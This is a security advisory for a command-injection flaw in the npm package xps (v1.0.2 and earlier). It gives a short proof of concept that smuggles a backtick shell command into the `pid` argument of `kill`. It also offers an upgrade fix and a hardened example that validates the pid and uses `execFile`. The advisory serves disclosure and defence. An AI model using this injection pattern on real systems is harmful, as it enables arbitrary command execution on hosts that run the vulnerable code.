xps is a cross-platform library for listing and killing processes.
Affected versions of this package are vulnerable to Command Injection. The argument
pid is used to build the command that is passed to the
child_process.exec function without any sanitization.
PoC by Alessio (d3lla)
create a directory for testing
mkdir poc
cd poc/
install latest vulnerable xps module (v1.0.2):
npm i xps@1.0.2
const ps = require('xps');
ps.kill('`touch HACKED;`').fork();
make sure that the HACKED file does not exist:
the HACKED file is created:
Upgrade xps to version 1.0.3 or higher.
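The string-building pattern described in this advisory, next to a hardened form, as an added example that is not xps source code. The function names, the kill/taskkill command lines and the 10-digit pid limit are assumptions made for illustration.

```javascript
// Added example, not xps source. All names here are hypothetical.

// Vulnerable pattern from the advisory: pid is concatenated into a string
// that child_process.exec would pass to a shell for interpretation.
function buildKillCommandUnsafe(pid) {
  return 'kill -9 ' + pid; // backticks, ';', '$()' in pid reach the shell
}

// Hardened: accept only a positive decimal integer. Rejecting 0 and negative
// values also avoids signalling whole process groups on POSIX.
function parsePid(pid) {
  const text = String(pid);
  if (!/^[1-9][0-9]{0,9}$/.test(text)) {
    throw new TypeError('pid must be a positive integer');
  }
  return Number(text);
}

// Build an argv array instead of a command string (command lines assumed).
function killArgv(pid, platform = process.platform) {
  const n = String(parsePid(pid));
  return platform === 'win32'
    ? ['taskkill', ['/PID', n, '/F']]
    : ['kill', ['-9', n]];
}

// execFile runs the binary directly with argv; no shell parses the input.
function killSafe(pid, callback) {
  const { execFile } = require('child_process');
  const [file, args] = killArgv(pid);
  return execFile(file, args, callback);
}

// Constructed sample input: the PoC string from this advisory.
const sample = '`touch HACKED;`';
console.log('unsafe command string:', buildKillCommandUnsafe(sample));
try {
  killArgv(sample);
} catch (err) {
  console.log('hardened path rejected input:', err.message);
}
```

Validation happens before any process is spawned, so a rejected pid never reaches the operating system.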
- 23 Jul, 2020
- 24 Jul, 2020